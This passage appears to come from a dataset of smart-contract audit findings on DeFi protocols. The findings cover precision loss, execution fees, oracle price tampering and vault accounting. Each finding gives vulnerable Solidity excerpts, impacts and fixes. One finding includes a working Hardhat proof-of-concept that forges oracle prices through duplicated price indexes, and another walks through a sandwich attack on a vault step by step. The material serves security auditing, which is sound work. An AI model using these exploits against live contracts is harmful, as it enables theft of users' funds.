trades in 
terms of risk. You can trade without any risk by conttroling when to execute the transaction,"```\\n function createOrder(\\n DataStore dataStore,\\n EventEmitter eventEmitter,\\n OrderVault orderVault,\\n IReferralStorage referralStorage,\\n address account,\\n BaseOrderUtils.CreateOrderParams memory params\\n ) external returns (bytes32) {\\n ReferralUtils.setTraderReferralCode(referralStorage, account, params.referralCode);\\n\\n uint256 initialCollateralDeltaAmount;\\n\\n address wnt = TokenUtils.wnt(dataStore);\\n\\n bool shouldRecordSeparateExecutionFeeTransfer = true;\\n\\n if (\\n params.orderType == Order.OrderType.MarketSwap ||\\n params.orderType == Order.OrderType.LimitSwap ||\\n params.orderType == Order.OrderType.MarketIncrease ||\\n params.orderType == Order.OrderType.LimitIncrease\\n ) {\\n initialCollateralDeltaAmount = orderVault.recordTransferIn(params.addresses.initialCollateralToken);\\n if (params.addresses.initialCollateralToken == wnt) {\\n if (initialCollateralDeltaAmount < params.numbers.executionFee) {\\n revert InsufficientWntAmountForExecutionFee(initialCollateralDeltaAmount, params.numbers.executionFee);\\n }\\n initialCollateralDeltaAmount -= params.numbers.executionFee;\\n shouldRecordSeparateExecutionFeeTransfer = false;\\n }\\n } else if (\\n params.orderType == Order.OrderType.MarketDecrease ||\\n params.orderType == Order.OrderType.LimitDecrease ||\\n params.orderType == Order.OrderType.StopLossDecrease\\n ) {\\n initialCollateralDeltaAmount = params.numbers.initialCollateralDeltaAmount;\\n } else {\\n revert OrderTypeCannotBeCreated(params.orderType);\\n }\\n\\n if (shouldRecordSeparateExecutionFeeTransfer) {\\n uint256 wntAmount = orderVault.recordTransferIn(wnt);\\n if (wntAmount < params.numbers.executionFee) {\\n revert InsufficientWntAmountForExecutionFee(wntAmount, params.numbers.executionFee);\\n }\\n\\n GasUtils.handleExcessExecutionFee(\\n dataStore,\\n orderVault,\\n wntAmount,\\n params.numbers.executionFee\\n );\\n 
}\\n\\n // validate swap path markets\\n MarketUtils.getEnabledMarkets(\\n dataStore,\\n params.addresses.swapPath\\n );\\n\\n Order.Props memory order;\\n\\n order.setAccount(account);\\n order.setReceiver(params.addresses.receiver);\\n order.setCallbackContract(params.addresses.callbackContract);\\n order.setMarket(params.addresses.market);\\n order.setInitialCollateralToken(params.addresses.initialCollateralToken);\\n order.setSwapPath(params.addresses.swapPath);\\n order.setOrderType(params.orderType);\\n order.setDecreasePositionSwapType(params.decreasePositionSwapType);\\n order.setSizeDeltaUsd(params.numbers.sizeDeltaUsd);\\n order.setInitialCollateralDeltaAmount(initialCollateralDeltaAmount);\\n order.setTriggerPrice(params.numbers.triggerPrice);\\n order.setAcceptablePrice(params.numbers.acceptablePrice);\\n order.setExecutionFee(params.numbers.executionFee);\\n order.setCallbackGasLimit(params.numbers.callbackGasLimit);\\n order.setMinOutputAmount(params.numbers.minOutputAmount);\\n order.setIsLong(params.isLong);\\n order.setShouldUnwrapNativeToken(params.shouldUnwrapNativeToken);\\n\\n ReceiverUtils.validateReceiver(order.receiver());\\n\\n if (order.initialCollateralDeltaAmount() == 0 && order.sizeDeltaUsd() == 0) {\\n revert BaseOrderUtils.EmptyOrder();\\n }\\n\\n CallbackUtils.validateCallbackGasLimit(dataStore, order.callbackGasLimit());\\n\\n uint256 estimatedGasLimit = GasUtils.estimateExecuteOrderGasLimit(dataStore, order);\\n GasUtils.validateExecutionFee(dataStore, estimatedGasLimit, order.executionFee());\\n\\n bytes32 key = NonceUtils.getNextKey(dataStore);\\n\\n order.touch();\\n OrderStoreUtils.set(dataStore, key, order);\\n\\n OrderEventUtils.emitOrderCreated(eventEmitter, key, order);\\n\\n return key;\\n}\\n```\\n" +Multiplication after Division error leading to larger precision loss,medium,"There are couple of instance of using result of a division for multiplication while can cause larger precision loss.\\n```\\nFile: 
MarketUtils.sol\\n\\n cache.fundingUsd = (cache.sizeOfLargerSide / Precision.FLOAT_PRECISION) * cache.durationInSeconds * cache.fundingFactorPerSecond;\\n\\n if (result.longsPayShorts) {\\n cache.fundingUsdForLongCollateral = cache.fundingUsd * cache.oi.longOpenInterestWithLongCollateral / cache.oi.longOpenInterest;\\n cache.fundingUsdForShortCollateral = cache.fundingUsd * cache.oi.longOpenInterestWithShortCollateral / cache.oi.longOpenInterest;\\n } else {\\n cache.fundingUsdForLongCollateral = cache.fundingUsd * cache.oi.shortOpenInterestWithLongCollateral / cache.oi.shortOpenInterest;\\n cache.fundingUsdForShortCollateral = cache.fundingUsd * cache.oi.shortOpenInterestWithShortCollateral / cache.oi.shortOpenInterest;\\n }\\n```\\n\\nLink to Code\\nIn above case, value of `cache.fundingUsd` is calculated by first dividing `cache.sizeOfLargerSide` with `Precision.FLOAT_PRECISION` which is `10**30`. Then the resultant is multiplied further. This result in larger Loss of precision.\\nLater the same `cache.fundingUsd` is used to calculate `cache.fundingUsdForLongCollateral` and `cache.fundingUsdForShortCollateral` by multiplying further which makes the precision error even more big.\\nSame issue is there in calculating `cache.positionPnlUsd` in `PositionUtils`.\\n```\\nFile: PositionUtils.sol\\n\\n if (position.isLong()) {\\n cache.sizeDeltaInTokens = Calc.roundUpDivision(position.sizeInTokens() * sizeDeltaUsd, position.sizeInUsd());\\n } else {\\n cache.sizeDeltaInTokens = position.sizeInTokens() * sizeDeltaUsd / position.sizeInUsd();\\n }\\n }\\n\\n cache.positionPnlUsd = cache.totalPositionPnl * cache.sizeDeltaInTokens.toInt256() / position.sizeInTokens().toInt256();\\n```\\n\\nLink to Code",First Multiply all the numerators and then divide it by the product of all the denominator.,Precision Loss in accounting.,```\\nFile: MarketUtils.sol\\n\\n cache.fundingUsd = (cache.sizeOfLargerSide / Precision.FLOAT_PRECISION) * cache.durationInSeconds * 
cache.fundingFactorPerSecond;\\n\\n if (result.longsPayShorts) {\\n cache.fundingUsdForLongCollateral = cache.fundingUsd * cache.oi.longOpenInterestWithLongCollateral / cache.oi.longOpenInterest;\\n cache.fundingUsdForShortCollateral = cache.fundingUsd * cache.oi.longOpenInterestWithShortCollateral / cache.oi.longOpenInterest;\\n } else {\\n cache.fundingUsdForLongCollateral = cache.fundingUsd * cache.oi.shortOpenInterestWithLongCollateral / cache.oi.shortOpenInterest;\\n cache.fundingUsdForShortCollateral = cache.fundingUsd * cache.oi.shortOpenInterestWithShortCollateral / cache.oi.shortOpenInterest;\\n }\\n```\\n +"when execute deposit fails, cancel deposit will be called which means that execution fee for keeper will be little for executing the cancellation depending on where the executeDeposit fails",medium,"When execute deposit fails, the deposit will be automatically cancelled. However, since executeDeposit has taken up a portion of the execution fee, execution fee left for cancellation might be little and keeper will lose out on execution fee.\\nIn `executeDeposit` when an error is thrown, `_handleDepositError` is called.\\n```\\n _handleDepositError(\\n key,\\n startingGas,\\n reasonBytes\\n );\\n```\\n\\nNotice that in `_handleDepositError` that `cancelDeposit` is called which will pay execution fee to the keeper. 
However, since the failure can have failed at the late stage of executeDeposit, the execution fee left for the cancellation will be little for the keeper.\\n```\\n function _handleDepositError(\\n bytes32 key,\\n uint256 startingGas,\\n bytes memory reasonBytes\\n ) internal {\\n (string memory reason, /* bool hasRevertMessage */) = ErrorUtils.getRevertMessage(reasonBytes);\\n\\n\\n bytes4 errorSelector = ErrorUtils.getErrorSelectorFromData(reasonBytes);\\n\\n\\n if (OracleUtils.isEmptyPriceError(errorSelector)) {\\n ErrorUtils.revertWithCustomError(reasonBytes);\\n }\\n\\n\\n DepositUtils.cancelDeposit(\\n dataStore,\\n eventEmitter,\\n depositVault,\\n key,\\n msg.sender,\\n startingGas,\\n reason,\\n reasonBytes\\n );\\n }\\n}\\n```\\n\\nNote: This also applies to failed `executeWithdrawal`.",Recommend increasing the minimum required execution fee to account for failed deposit and refund the excess to the user when a deposit succeeds.,Keeper will lose out on execution fee in the event of a failed deposit.,"```\\n _handleDepositError(\\n key,\\n startingGas,\\n reasonBytes\\n );\\n```\\n" +The oracle price could be tampered,medium,"The `_setPrices()` function is missing to check duplicated prices indexes. 
Attackers such as malicious order keepers can exploit it to tamper signed prices.\\nThe following test script shows how it works\\n```\\nimport { expect } from ""chai"";\\n\\nimport { deployContract } from ""../../utils/deploy"";\\nimport { deployFixture } from ""../../utils/fixture"";\\nimport {\\n TOKEN_ORACLE_TYPES,\\n signPrices,\\n getSignerInfo,\\n getCompactedPrices,\\n getCompactedPriceIndexes,\\n getCompactedDecimals,\\n getCompactedOracleBlockNumbers,\\n getCompactedOracleTimestamps,\\n} from ""../../utils/oracle"";\\nimport { printGasUsage } from ""../../utils/gas"";\\nimport { grantRole } from ""../../utils/role"";\\nimport * as keys from ""../../utils/keys"";\\n\\ndescribe(""AttackOracle"", () => {\\n const { provider } = ethers;\\n\\n let user0, signer0, signer1, signer2, signer3, signer4, signer7, signer9;\\n let roleStore, dataStore, eventEmitter, oracleStore, oracle, wnt, wbtc, usdc;\\n let oracleSalt;\\n\\n beforeEach(async () => {\\n const fixture = await deployFixture();\\n ({ user0, signer0, signer1, signer2, signer3, signer4, signer7, signer9 } = fixture.accounts);\\n\\n ({ roleStore, dataStore, eventEmitter, oracleStore, oracle, wnt, wbtc, usdc } = fixture.contracts);\\n ({ oracleSalt } = fixture.props);\\n });\\n\\n it(""inits"", async () => {\\n expect(await oracle.oracleStore()).to.eq(oracleStore.address);\\n expect(await oracle.SALT()).to.eq(oracleSalt);\\n });\\n\\n it(""tamperPrices"", async () => {\\n const blockNumber = (await provider.getBlock()).number;\\n const blockTimestamp = (await provider.getBlock()).timestamp;\\n await dataStore.setUint(keys.MIN_ORACLE_SIGNERS, 2);\\n const block = await provider.getBlock(blockNumber);\\n\\n let signerInfo = getSignerInfo([0, 1]);\\n let minPrices = [1000, 1000]; // if some signers sign a same price\\n let maxPrices = [1010, 1010]; // if some signers sign a same price\\n let signatures = await signPrices({\\n signers: [signer0, signer1],\\n salt: oracleSalt,\\n minOracleBlockNumber: 
blockNumber,\\n maxOracleBlockNumber: blockNumber,\\n oracleTimestamp: blockTimestamp,\\n blockHash: block.hash,\\n token: wnt.address,\\n tokenOracleType: TOKEN_ORACLE_TYPES.DEFAULT,\\n precision: 1,\\n minPrices,\\n maxPrices,\\n });\\n\\n // attacker tamper the prices and indexes\\n minPrices[1] = 2000\\n maxPrices[1] = 2020\\n let indexes = getCompactedPriceIndexes([0, 0]) // share the same index\\n\\n await oracle.setPrices(dataStore.address, eventEmitter.address, {\\n priceFeedTokens: [],\\n signerInfo,\\n tokens: [wnt.address],\\n compactedMinOracleBlockNumbers: [blockNumber],\\n compactedMaxOracleBlockNumbers: [blockNumber],\\n compactedOracleTimestamps: [blockTimestamp],\\n compactedDecimals: getCompactedDecimals([1]),\\n compactedMinPrices: getCompactedPrices(minPrices),\\n compactedMinPricesIndexes: indexes,\\n compactedMaxPrices: getCompactedPrices(maxPrices),\\n compactedMaxPricesIndexes: indexes,\\n signatures,\\n });\\n\\n const decimals = 10\\n expect((await oracle.getPrimaryPrice(wnt.address)).min).eq(1500 * decimals);\\n expect((await oracle.getPrimaryPrice(wnt.address)).max).eq(1515 * decimals);\\n });\\n\\n});\\n```\\n\\nThe output\\n```\\n> npx hardhat test .\\test\\oracle\\AttackOracle.ts\\n\\n\\n AttackOracle\\n √ inits\\n √ tamperPrices (105ms)\\n\\n\\n 2 passing (13s)\\n```\\n",Don't allow duplicated prices indexes,Steal funds from the vault and markets.,"```\\nimport { expect } from ""chai"";\\n\\nimport { deployContract } from ""../../utils/deploy"";\\nimport { deployFixture } from ""../../utils/fixture"";\\nimport {\\n TOKEN_ORACLE_TYPES,\\n signPrices,\\n getSignerInfo,\\n getCompactedPrices,\\n getCompactedPriceIndexes,\\n getCompactedDecimals,\\n getCompactedOracleBlockNumbers,\\n getCompactedOracleTimestamps,\\n} from ""../../utils/oracle"";\\nimport { printGasUsage } from ""../../utils/gas"";\\nimport { grantRole } from ""../../utils/role"";\\nimport * as keys from ""../../utils/keys"";\\n\\ndescribe(""AttackOracle"", () => {\\n 
const { provider } = ethers;\\n\\n let user0, signer0, signer1, signer2, signer3, signer4, signer7, signer9;\\n let roleStore, dataStore, eventEmitter, oracleStore, oracle, wnt, wbtc, usdc;\\n let oracleSalt;\\n\\n beforeEach(async () => {\\n const fixture = await deployFixture();\\n ({ user0, signer0, signer1, signer2, signer3, signer4, signer7, signer9 } = fixture.accounts);\\n\\n ({ roleStore, dataStore, eventEmitter, oracleStore, oracle, wnt, wbtc, usdc } = fixture.contracts);\\n ({ oracleSalt } = fixture.props);\\n });\\n\\n it(""inits"", async () => {\\n expect(await oracle.oracleStore()).to.eq(oracleStore.address);\\n expect(await oracle.SALT()).to.eq(oracleSalt);\\n });\\n\\n it(""tamperPrices"", async () => {\\n const blockNumber = (await provider.getBlock()).number;\\n const blockTimestamp = (await provider.getBlock()).timestamp;\\n await dataStore.setUint(keys.MIN_ORACLE_SIGNERS, 2);\\n const block = await provider.getBlock(blockNumber);\\n\\n let signerInfo = getSignerInfo([0, 1]);\\n let minPrices = [1000, 1000]; // if some signers sign a same price\\n let maxPrices = [1010, 1010]; // if some signers sign a same price\\n let signatures = await signPrices({\\n signers: [signer0, signer1],\\n salt: oracleSalt,\\n minOracleBlockNumber: blockNumber,\\n maxOracleBlockNumber: blockNumber,\\n oracleTimestamp: blockTimestamp,\\n blockHash: block.hash,\\n token: wnt.address,\\n tokenOracleType: TOKEN_ORACLE_TYPES.DEFAULT,\\n precision: 1,\\n minPrices,\\n maxPrices,\\n });\\n\\n // attacker tamper the prices and indexes\\n minPrices[1] = 2000\\n maxPrices[1] = 2020\\n let indexes = getCompactedPriceIndexes([0, 0]) // share the same index\\n\\n await oracle.setPrices(dataStore.address, eventEmitter.address, {\\n priceFeedTokens: [],\\n signerInfo,\\n tokens: [wnt.address],\\n compactedMinOracleBlockNumbers: [blockNumber],\\n compactedMaxOracleBlockNumbers: [blockNumber],\\n compactedOracleTimestamps: [blockTimestamp],\\n compactedDecimals: 
getCompactedDecimals([1]),\\n compactedMinPrices: getCompactedPrices(minPrices),\\n compactedMinPricesIndexes: indexes,\\n compactedMaxPrices: getCompactedPrices(maxPrices),\\n compactedMaxPricesIndexes: indexes,\\n signatures,\\n });\\n\\n const decimals = 10\\n expect((await oracle.getPrimaryPrice(wnt.address)).min).eq(1500 * decimals);\\n expect((await oracle.getPrimaryPrice(wnt.address)).max).eq(1515 * decimals);\\n });\\n\\n});\\n```\\n" +boundedSub() might fail to return the result that is bounded to prevent overflows,medium,"The goal of `boundedSub()` is to bound the result regardless what the inputs are to prevent overflows/underflows. However, the goal is not achieved for some cases. As a result, `boundedSub()` still might underflow and still might revert. The goal of the function is not achieved.\\nAs a result, the protocol might not be fault-tolerant as it is supposed to be - when `boundedSub()` is designed to not revert in any case, it still might revert. For example, function `MarketUtils.getNextFundingAmountPerSize()` will be affected.\\n`boundedSub()` is designed to always bound its result between `type(int256).min` and `type(int256).max` so that it will never overflow/underflow:\\nIt achieves its goal in three cases:\\nCase 1: `if either a or b is zero or the signs are the same there should not be any overflow`.\\nCase 2: `a > 0`, and `b < 0`, and `a-b > type(int256).max`, then we need to return `type(int256).max`.\\nCase 3: `a < 0`, and `b > 0`, and a - b < `type(int256).min`, then we need to return `type(int256).min`\\nUnfortunately, the third case is implemented wrongly as follows:\\n```\\n // if subtracting `b` from `a` would result in a value less than the min int256 value\\n // then return the min int256 value\\n if (a < 0 && b <= type(int256).min - a) {\\n return type(int256).min;\\n }\\n```\\n\\nwhich essentially is checking a < 0 && b + a <= `type(int256).min`, a wrong condition to check. 
Because of using this wrong condition, underflow cases will not be detected and the function will revert instead of returning `type(int256).min` in this case.\\nTo verify, suppose a = `type(int256).min` and b = 1, `a-b` needs to be bounded to prevent underflow and the function should have returned `type(int256).min`. However, the function will fail the condition, as a result, it will not execute the if part, and the following final line will be executed instead:\\n```\\nreturn a - b;\\n```\\n\\nAs a result, instead of returning the minimum, the function will revert in the last line due to underflow. This violates the property of the function: it should have returned the bounded result `type(int256).min` and should not have reverted in any case.\\nThe following POC in Remix can show that the following function will revert:\\n```\\nfunction testBoundedSub() public pure returns (int256){\\n return boundedSub(type(int256).min+3, 4);\\n}\\n```\\n","The correction is as follows:\\n```\\n function boundedSub(int256 a, int256 b) internal pure returns (int256) {\\n // if either a or b is zero or the signs are the same there should not be any overflow\\n if (a == 0 || b == 0 || (a > 0 && b > 0) || (a < 0 && b < 0)) {\\n return a // Remove the line below\\n b;\\n }\\n\\n // if adding `// Remove the line below\\nb` to `a` would result in a value greater than the max int256 value\\n // then return the max int256 value\\n if (a > 0 && // Remove the line below\\nb >= type(int256).max // Remove the line below\\n a) {\\n return type(int256).max;\\n }\\n\\n // if subtracting `b` from `a` would result in a value less than the min int256 value\\n // then return the min int256 value\\n// Remove the line below\\n if (a < 0 && b <= type(int256).min // Remove the line below\\n a) {\\n// Add the line below\\n if (a < 0 && a <= type(int256).min // Add the line below\\n b) {\\n return type(int256).min;\\n }\\n\\n return a // Remove the line below\\n b;\\n }\\n```\\n","`boundedSub()` does not 
guarantee underflow/overflow free as it is designed to be. As a result, the protocol might break at points when it is not supposed to break. For example, function `MarketUtils.getNextFundingAmountPerSize()` will be affected.",```\\n // if subtracting `b` from `a` would result in a value less than the min int256 value\\n // then return the min int256 value\\n if (a < 0 && b <= type(int256).min - a) {\\n return type(int256).min;\\n }\\n```\\n +Adversary can sandwich oracle updates to exploit vault,high,"BLVaultLido added a mechanism to siphon off all wstETH obtained from mismatched pool and oracle prices. This was implemented to fix the problem that the vault could be manipulated to the attackers gain. This mitigation however does not fully address the issue and the same issue is still exploitable by sandwiching oracle update.\\nBLVaultLido.sol#L232-L240\\n```\\n uint256 wstethOhmPrice = manager.getTknOhmPrice();\\n uint256 expectedWstethAmountOut = (ohmAmountOut * wstethOhmPrice) / _OHM_DECIMALS;\\n\\n // Take any arbs relative to the oracle price for the Treasury and return the rest to the owner\\n uint256 wstethToReturn = wstethAmountOut > expectedWstethAmountOut\\n ? expectedWstethAmountOut\\n : wstethAmountOut;\\n if (wstethAmountOut > wstethToReturn)\\n wsteth.safeTransfer(TRSRY(), wstethAmountOut - wstethToReturn);\\n```\\n\\nIn the above lines we can see that the current oracle price is used to calculate the expected amount of wstETH to return to the user. In theory this should prevent the attack but an attacker can side step this sandwiching the oracle update.\\nExample:\\nThe POC is very similar to before except now it's composed of two transactions sandwiching the oracle update. Chainlink oracles have a tolerance threshold of 0.5% before updating so we will use that as our example value. The current price is assumed to be 0.995 wstETH/OHM. 
The oracle price (which is about to be updated) is currently 1:1\\n```\\nTransaction 1:\\n\\nBalances before attack (0.995:1)\\nLiquidity: 79.8 OHM 80.2 wstETH\\nAdversary: 20 wstETH\\n\\nSwap OHM so that pool price matches pre-update oracle price:\\nLiquidity: 80 OHM 80 wstETH\\nAdversary: -0.2 OHM 20.2 wstETH\\n\\nBalances after adversary has deposited to the pool:\\nLiquidity: 100 OHM 100 wstETH\\nAdversary: -0.2 OHM 0.2 wstETH\\n\\nBalances after adversary sells wstETH for OHM (0.5% movement in price):\\nLiquidity: 99.748 OHM 100.252 wstETH\\nAdversary: 0.052 OHM -0.052 wstETH\\n\\nSandwiched Oracle Update:\\n\\nOracle updates price of wstETH to 0.995 OHM. Since the attacker already sold wstETH to balance \\nthe pool to the post-update price they will be able to withdraw the full amount of wstETH.\\n\\nTransaction 2:\\n\\nBalances after adversary removes their liquidity:\\nLiquidity: 79.798 OHM 80.202 wstETH\\nAdversary: 0.052 OHM 19.998 wstETH\\n\\nBalances after selling profited OHM:\\nLiquidity: 79.849 OHM 80.152 wstETH\\nAdversary: 20.05 wstETH\\n```\\n\\nAs shown above it's still profitable to exploit the vault by sandwiching the oracle updates. With each oracle update the pool can be repeatedly attacked causing large losses.",To prevent this I would recommend locking the user into the vault for some minimum amount of time (i.e. 24 hours),Vault will be attacked repeatedly for large losses,"```\\n uint256 wstethOhmPrice = manager.getTknOhmPrice();\\n uint256 expectedWstethAmountOut = (ohmAmountOut * wstethOhmPrice) / _OHM_DECIMALS;\\n\\n // Take any arbs relative to the oracle price for the Treasury and return the rest to the owner\\n uint256 wstethToReturn = wstethAmountOut > expectedWstethAmountOut\\n ? 
expectedWstethAmountOut\\n : wstethAmountOut;\\n if (wstethAmountOut > wstethToReturn)\\n wsteth.safeTransfer(TRSRY(), wstethAmountOut - wstethToReturn);\\n```\\n" +minTokenAmounts_ is useless in new configuration and doesn't provide any real slippage protection,high,"BLVaultLido#withdraw skims off extra stETH from the user that results from oracle arb. The problem with this is that minTokenAmounts_ no longer provides any slippage protection because it only ensures that enough is received from the liquidity pool but never enforces how much is received by the user.\\nBLVaultLido.sol#L224-L247\\n```\\n _exitBalancerPool(lpAmount_, minTokenAmounts_);\\n\\n // Calculate OHM and wstETH amounts received\\n uint256 ohmAmountOut = ohm.balanceOf(address(this)) - ohmBefore;\\n uint256 wstethAmountOut = wsteth.balanceOf(address(this)) - wstethBefore;\\n\\n // Calculate oracle expected wstETH received amount\\n // getTknOhmPrice returns the amount of wstETH per 1 OHM based on the oracle price\\n uint256 wstethOhmPrice = manager.getTknOhmPrice();\\n uint256 expectedWstethAmountOut = (ohmAmountOut * wstethOhmPrice) / _OHM_DECIMALS;\\n\\n // Take any arbs relative to the oracle price for the Treasury and return the rest to the owner\\n uint256 wstethToReturn = wstethAmountOut > expectedWstethAmountOut\\n ? expectedWstethAmountOut\\n : wstethAmountOut;\\n if (wstethAmountOut > wstethToReturn)\\n wsteth.safeTransfer(TRSRY(), wstethAmountOut - wstethToReturn);\\n\\n // Burn OHM\\n ohm.increaseAllowance(MINTR(), ohmAmountOut);\\n manager.burnOhmFromVault(ohmAmountOut);\\n\\n // Return wstETH to owner\\n wsteth.safeTransfer(msg.sender, wstethToReturn);\\n```\\n\\nminTokenAmounts_ only applies to the removal of liquidity. Since wstETH is skimmed off to the treasury the user no longer has any way to protect themselves from slippage. 
As shown in my other submission, oracle slop can lead to loss of funds due to this skimming.",Allow the user to specify the amount of wstETH they receive AFTER the arb is skimmed.,Users cannot protect themselves from oracle slop/wstETH skimming,"```\\n _exitBalancerPool(lpAmount_, minTokenAmounts_);\\n\\n // Calculate OHM and wstETH amounts received\\n uint256 ohmAmountOut = ohm.balanceOf(address(this)) - ohmBefore;\\n uint256 wstethAmountOut = wsteth.balanceOf(address(this)) - wstethBefore;\\n\\n // Calculate oracle expected wstETH received amount\\n // getTknOhmPrice returns the amount of wstETH per 1 OHM based on the oracle price\\n uint256 wstethOhmPrice = manager.getTknOhmPrice();\\n uint256 expectedWstethAmountOut = (ohmAmountOut * wstethOhmPrice) / _OHM_DECIMALS;\\n\\n // Take any arbs relative to the oracle price for the Treasury and return the rest to the owner\\n uint256 wstethToReturn = wstethAmountOut > expectedWstethAmountOut\\n ? expectedWstethAmountOut\\n : wstethAmountOut;\\n if (wstethAmountOut > wstethToReturn)\\n wsteth.safeTransfer(TRSRY(), wstethAmountOut - wstethToReturn);\\n\\n // Burn OHM\\n ohm.increaseAllowance(MINTR(), ohmAmountOut);\\n manager.burnOhmFromVault(ohmAmountOut);\\n\\n // Return wstETH to owner\\n wsteth.safeTransfer(msg.sender, wstethToReturn);\\n```\\n" +Adversary can stake LP directly for the vault then withdraw to break lp accounting in BLVaultManagerLido,high,"The AuraRewardPool allows users to stake directly for other users. In this case the malicious user could stake LP directly for their vault then call withdraw on their vault. This would cause the LP tracking to break on BLVaultManagerLido. 
The result is that some users would now be permanently trapped because their vault would revert when trying to withdraw.\\nBaseRewardPool.sol#L196-L207\\n```\\nfunction stakeFor(address _for, uint256 _amount)\\n public\\n returns(bool)\\n{\\n _processStake(_amount, _for);\\n\\n //take away from sender\\n stakingToken.safeTransferFrom(msg.sender, address(this), _amount);\\n emit Staked(_for, _amount);\\n \\n return true;\\n}\\n```\\n\\nAuraRewardPool allows users to stake directly for another address with them receiving the staked tokens.\\nBLVaultLido.sol#L218-L224\\n```\\n manager.decreaseTotalLp(lpAmount_);\\n\\n // Unstake from Aura\\n auraRewardPool().withdrawAndUnwrap(lpAmount_, claim_);\\n\\n // Exit Balancer pool\\n _exitBalancerPool(lpAmount_, minTokenAmounts_);\\n```\\n\\nOnce the LP has been stake the adversary can immediately withdraw it from their vault. This calls decreaseTotalLP on BLVaultManagerLido which now permanently break the LP account.\\nBLVaultManagerLido.sol#L277-L280\\n```\\nfunction decreaseTotalLp(uint256 amount_) external override onlyWhileActive onlyVault {\\n if (amount_ > totalLp) revert BLManagerLido_InvalidLpAmount();\\n totalLp -= amount_;\\n}\\n```\\n\\nIf the amount_ is ever greater than totalLP it will cause decreaseTotalLP to revert. By withdrawing LP that was never deposited to a vault, it permanently breaks other users from being able to withdraw.\\nExample: User A deposits wstETH to their vault which yields 50 LP. User B creates a vault then stake 50 LP and withdraws it from his vault. The manager now thinks there is 0 LP in vaults. When User A tries to withdraw their LP it will revert when it calls manger.decreaseTotalLp. 
User A is now permanently trapped in the vault.",Individual vaults should track how much they have deposited and shouldn't be allowed to withdraw more than deposited.,LP accounting is broken and users are permanently trapped.,"```\\nfunction stakeFor(address _for, uint256 _amount)\\n public\\n returns(bool)\\n{\\n _processStake(_amount, _for);\\n\\n //take away from sender\\n stakingToken.safeTransferFrom(msg.sender, address(this), _amount);\\n emit Staked(_for, _amount);\\n \\n return true;\\n}\\n```\\n" +Users can abuse discrepancies between oracle and true asset price to mint more OHM than needed and profit from it,high,"All chainlink oracles have a deviation threshold between the current price of the asset and the on-chain price for that asset. The more oracles used for determining the price the larger the total discrepancy can be. These can be combined and exploited to mint more OHM than expected and profit.\\nBLVaultLido.sol#L156-L171\\n```\\n uint256 ohmWstethPrice = manager.getOhmTknPrice();\\n uint256 ohmMintAmount = (amount_ * ohmWstethPrice) / _WSTETH_DECIMALS;\\n\\n // Block scope to avoid stack too deep\\n {\\n // Cache OHM-wstETH BPT before\\n uint256 bptBefore = liquidityPool.balanceOf(address(this));\\n\\n // Transfer in wstETH\\n wsteth.safeTransferFrom(msg.sender, address(this), amount_);\\n\\n // Mint OHM\\n manager.mintOhmToVault(ohmMintAmount);\\n\\n // Join Balancer pool\\n _joinBalancerPool(ohmMintAmount, amount_, minLpAmount_);\\n```\\n\\nThe amount of OHM to mint and deposit is determined by the calculated price from the on-chain oracle prices.\\nBLVaultLido.sol#L355-L364\\n```\\n uint256[] memory maxAmountsIn = new uint256[](2);\\n maxAmountsIn[0] = ohmAmount_;\\n maxAmountsIn[1] = wstethAmount_;\\n\\n JoinPoolRequest memory joinPoolRequest = JoinPoolRequest({\\n assets: assets,\\n maxAmountsIn: maxAmountsIn,\\n userData: abi.encode(1, maxAmountsIn, minLpAmount_),\\n fromInternalBalance: false\\n });\\n```\\n\\nTo make the issue worse, 
_joinBalancerPool use 1 for the join type. This is the EXACT_TOKENS_IN_FOR_BPT_OUT method of joining. What this means is that the join will guaranteed use all input tokens. If the current pool isn't balanced in the same way then the join request will effectively swap one token so that the input tokens match the current pool. Now if the ratio is off then too much OHM will be minted and will effectively traded for wstETH. This allows the user to withdraw at a profit once the oracle has been updated the discrepancy is gone.",The vault needs to have withdraw and/or deposit fees to make attacks like this unprofitable.,Users can always time oracles so that they enter at an advantageous price and the deficit is paid by Olympus with minted OHM,"```\\n uint256 ohmWstethPrice = manager.getOhmTknPrice();\\n uint256 ohmMintAmount = (amount_ * ohmWstethPrice) / _WSTETH_DECIMALS;\\n\\n // Block scope to avoid stack too deep\\n {\\n // Cache OHM-wstETH BPT before\\n uint256 bptBefore = liquidityPool.balanceOf(address(this));\\n\\n // Transfer in wstETH\\n wsteth.safeTransferFrom(msg.sender, address(this), amount_);\\n\\n // Mint OHM\\n manager.mintOhmToVault(ohmMintAmount);\\n\\n // Join Balancer pool\\n _joinBalancerPool(ohmMintAmount, amount_, minLpAmount_);\\n```\\n" +stETH/ETH chainlink oracle has too long of heartbeat and deviation threshold which can cause loss of funds,medium,"getTknOhmPrice uses the stETH/ETH chainlink oracle to calculate the current price of the OHM token. This token valuation is used to determine the amount of stETH to skim from the user resulting from oracle arb. This is problematic since stETH/ETH has a 24 hour heartbeat and a 2% deviation threshold. 
This deviation in price could easily cause loss of funds to the user.\\nBLVaultManagerLido.sol#L458-L473\\n```\\nfunction getTknOhmPrice() public view override returns (uint256) {\\n // Get stETH per wstETH (18 Decimals)\\n uint256 stethPerWsteth = IWsteth(pairToken).stEthPerToken();\\n\\n // Get ETH per OHM (18 Decimals)\\n uint256 ethPerOhm = _validatePrice(ohmEthPriceFeed.feed, ohmEthPriceFeed.updateThreshold);\\n\\n // Get stETH per ETH (18 Decimals)\\n uint256 stethPerEth = _validatePrice(\\n stethEthPriceFeed.feed,\\n stethEthPriceFeed.updateThreshold\\n );\\n\\n // Calculate wstETH per OHM (18 decimals)\\n return (ethPerOhm * 1e36) / (stethPerWsteth * stethPerEth);\\n}\\n```\\n\\ngetTknOhmPrice uses the stETH/ETH oracle to determine the price which as stated above has a 24 hour heartbeat and 2% deviation threshold, this means that the price can move up to 2% or 24 hours before a price update is triggered. The result is that the on-chain price could be much different than the true stETH price.\\nBLVaultLido.sol#L232-L240\\n```\\n uint256 wstethOhmPrice = manager.getTknOhmPrice();\\n uint256 expectedWstethAmountOut = (ohmAmountOut * wstethOhmPrice) / _OHM_DECIMALS;\\n\\n // Take any arbs relative to the oracle price for the Treasury and return the rest to the owner\\n uint256 wstethToReturn = wstethAmountOut > expectedWstethAmountOut\\n ? expectedWstethAmountOut\\n : wstethAmountOut;\\n if (wstethAmountOut > wstethToReturn)\\n wsteth.safeTransfer(TRSRY(), wstethAmountOut - wstethToReturn);\\n \\n```\\n\\n
